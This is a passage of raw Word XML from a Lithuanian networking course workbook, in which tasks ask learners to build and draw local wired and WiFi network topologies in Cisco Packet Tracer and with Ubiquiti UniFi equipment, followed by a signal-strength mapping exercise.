        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16594A9B" w14:textId="0B8296CD" w:rsidR="007070B6" w:rsidRPr="005A5C28" w:rsidRDefault="007070B6"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">3 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDODAMI MARŠRUTIZATORIŲ IR TRIS KOMPIUTERIUS SUDARYKITE LOKALŲ KOMPIUTERIŲ TINKLĄ. NUBRAIŽYKITE TINKLO TOPOLOGIJĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169D970" w14:textId="50230856" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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ATSAKYMO PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46806" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46806" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C77607" w14:textId="34865B00" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="003A1681" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29B9FCEE" wp14:editId="057F7063">
            <wp:extent cx="3257550" cy="1819275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId268">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3257550" cy="1819275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6307CA4D" w14:textId="3D253A51" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3 pav. Cisco Packet Tracer, tinklo topologija</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8CB0F" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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49C2C52E" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50136188" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA6DB35" w14:textId="77777777" w:rsidR="007070B6" w:rsidRPr="005A5C28" w:rsidRDefault="007070B6"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4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> NAUDODAMI BEVIELĮ MARŠRUTIZATORIŲ IR TRIS KOMPIUTERIUS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUDARYKITE LOKALŲ KOMPIUTERIŲ TINKLĄ. KOMPIUTERIUS PRIJUNKITE WIFI STANDARTU. NUBRAIŽYKITE TINKLO TOPOLOGIJĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EF6156" w14:textId="09A99CB9" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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O PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46806" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46806" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41762205" w14:textId="078A93BA" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="00902E46" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D77F640" wp14:editId="0C0A5D35">
            <wp:extent cx="3705225" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId269">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3705225" cy="2085975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C03E45E" w14:textId="7115D21B" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4 pav. Cisco Packet Tracer, tinklo topologija</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5CE015" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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420D823C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE76D0D" w14:textId="77777777" w:rsidR="007070B6" w:rsidRPr="005A5C28" w:rsidRDefault="007070B6"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5 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LOKALAUS TINKLO SUDARYMAS PANAUDOJANT CISCO ĮRANGĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7163930E" w14:textId="40B71932" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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O PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46806" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46806" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140D658B" w14:textId="11D3F50C" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="00563647" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B6C87F5" wp14:editId="238C63C9">
            <wp:extent cx="4590416" cy="2511425"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="45" name="Paveikslėlis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45"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId270">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4590416" cy="2511425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FD36DF" w14:textId="017AC1B7" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="00E1078C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="0025204D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Cisco Packet Tracer, tinklo topologija</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2EFDBF" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Šaltinis: Zykas A. (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC98871" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CFA8FDB" w14:textId="77777777" w:rsidR="007070B6" w:rsidRPr="005A5C28" w:rsidRDefault="007070B6"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6 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LOKALAUS TINKLO SUDARYMAS PANAUDOJANT UBIQUITI UNIFI ĮRANGĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F5A80A" w14:textId="12B3DE27" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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O PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46806" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46806" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0719E7CF" w14:textId="71D5CF41" w:rsidR="7C610705" w:rsidRPr="005A5C28" w:rsidRDefault="00BB24BA" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="327CEC52" wp14:editId="3F254950">
            <wp:extent cx="2456815" cy="3275965"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="11" name="Paveikslėli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456815" cy="3275965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B77E3A" w14:textId="505C84C6" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="00E1078C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="0025204D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Topologijos vaizdavimo pavyzdys. Remiantis pavyzdžiu sudaryti tinklą su turima įranga.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17723BA2" w14:textId="1F2CC518" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Netwifiworks. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://www.netwifiworks.com/images/UniFi/Camera/system-example.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1466710C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3764D2DB" w14:textId="77777777" w:rsidR="007070B6" w:rsidRPr="005A5C28" w:rsidRDefault="007070B6"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7 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>WIFI TINKLO ANALIZĖ. SIGNALO STIPRUMO ŽEMĖLAPIS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADF36B" w14:textId="77777777" w:rsidR="00DC0673" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673"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O PAVYZDYS / LAUKIAMAS REZULTATAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52672F20" w14:textId="6324A53F" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="00E36E1A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FE446D2" wp14:editId="7FA77B7B">
            <wp:extent cx="5654042" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="26" name="Paveikslėlis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26"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5654042" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B87BF48" w14:textId="63EE630E" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="00E1078C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
